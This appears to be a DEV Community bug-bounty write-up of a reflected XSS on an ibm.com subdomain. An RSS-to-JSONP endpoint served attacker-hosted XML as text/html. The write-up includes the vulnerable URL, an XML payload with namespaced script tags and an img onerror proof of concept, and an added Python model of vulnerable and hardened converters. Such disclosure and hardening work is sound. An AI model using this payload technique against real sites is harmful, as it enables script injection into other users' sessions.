DEV Community

Khaled Nassar

Reflected XSS by jsonp on ibm.com subdomain

hi :D
This is my write-up about a bug I found on ibm.com. First I collected archived URLs for ibm.com from web.archive.org with the waybackurls tool, and among them was this one: https://www-356.ibm.com/partnerworld/wps/servlet/pwdyn/pw/rss/rsstojson.jsp?ccdb=no&rssurl=https://www-2000.ibm.com/file.xml&_=1596170198353
This endpoint fetches the XML file named in the rssurl parameter and converts its content from XML to JSONP.

But the response comes back with the header Content-Type: text/html, so the browser renders the converted content as HTML instead of treating it as script data, and any HTML tags that survive the conversion are executed. So I created an XML file with an XSS payload, uploaded it to my website at https://knassar702.github.io/xss.xml,
and put the link to that file in the rssurl parameter:

```xml
<html>
  <head></head>
  <body>
    <!-- script elements in the XHTML namespace, tried with two different prefixes -->
    <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
    <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
    <info>
      <name>
        <!-- the CDATA keeps the tag intact through the XML parser; it fires once reflected as text/html -->
        <value><![CDATA[<img src=x onerror=confirm(document.domain)>]]></value>
      </name>
      <description>
        <value>Hello</value>
      </description>
      <url>
        <value>http://google.com</value>
      </url>
    </info>
  </body>
</html>
```
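To make the root cause concrete, here is an added example (my own code, not IBM's rsstojson.jsp and not part of the original post) that models the conversion in two forms: a vulnerable version that behaves the way the write-up describes, embedding the XML text verbatim and serving it as text/html, and a hardened version that serves the JSONP as application/javascript with nosniff, escapes `<`, `>` and `&` as JavaScript unicode escapes, validates the callback name, and checks the rssurl host against an allowlist. The sample XML, the `jsonp` callback name, the allowlisted host and the function names are all constructed for this example.

```python
import json
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample: the kind of file an attacker would host and point rssurl at.
# The CDATA section carries an HTML payload that survives XML parsing as plain text.
ATTACKER_XML = b"""<?xml version="1.0"?>
<info>
  <name><value><![CDATA[<img src=x onerror=confirm(document.domain)>]]></value></name>
  <description><value>Hello</value></description>
  <url><value>http://google.com</value></url>
</info>"""

# Assumption: the hosts the RSS feature legitimately proxies (the original URL used www-2000.ibm.com).
ALLOWED_RSS_HOSTS = {"www-2000.ibm.com"}

# A JSONP callback must be a plain identifier (dotted names allowed), nothing else.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")


def xml_to_dict(xml_bytes):
    """Collect the text of every <value> element, keyed by its parent's tag."""
    root = ET.fromstring(xml_bytes)
    out = {}
    for parent in root.iter():
        for child in parent:
            if child.tag == "value":
                out[parent.tag] = child.text or ""
    return out


def vulnerable_rsstojson(xml_bytes, callback="jsonp"):
    """Models the behaviour in the write-up: data embedded verbatim, served as text/html.
    json.dumps does not escape '<' or '>', so the tag reaches the browser intact."""
    data = xml_to_dict(xml_bytes)
    body = callback + "(" + json.dumps(data) + ");"
    return {"Content-Type": "text/html"}, body


def js_safe_json(obj):
    """JSON that is safe to embed in a script context: no raw '<', '>' or '&' can
    close a script or open a tag, whatever content type the response ends up with."""
    return (json.dumps(obj)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def is_valid_callback(name):
    return bool(CALLBACK_RE.match(name))


def rssurl_allowed(url):
    """Server-side fetch only from allowlisted hosts over https."""
    p = urlparse(url)
    return p.scheme == "https" and p.hostname in ALLOWED_RSS_HOSTS


def hardened_rsstojson(xml_bytes, callback="jsonp"):
    """Correct content type, nosniff so the browser cannot reinterpret the body,
    escaped data and a validated callback."""
    if not is_valid_callback(callback):
        raise ValueError("invalid JSONP callback name")
    data = xml_to_dict(xml_bytes)
    body = "/**/" + callback + "(" + js_safe_json(data) + ");"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


def renders_as_html(headers, body):
    """Check a practitioner can run on any response: will a browser parse this as
    HTML, and is there still a raw tag in it for the parser to act on?"""
    ct = headers.get("Content-Type", "").split(";")[0].strip().lower()
    return ct == "text/html" and "<" in body


if __name__ == "__main__":
    for builder in (vulnerable_rsstojson, hardened_rsstojson):
        h, b = builder(ATTACKER_XML)
        print(builder.__name__, "-> renders as HTML:", renders_as_html(h, b))
        print("   ", b)
    print("rssurl https://knassar702.github.io/xss.xml allowed:",
          rssurl_allowed("https://knassar702.github.io/xss.xml"))
```

The two fixes are independent and both are worth having: the content type plus nosniff stops the browser from treating the response as a document at all, and the escaping means that even a future caller that does inline the JSON into an HTML page gets no tag out of it. The host allowlist addresses the separate issue that the endpoint fetches whatever URL it is given.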

Done :D
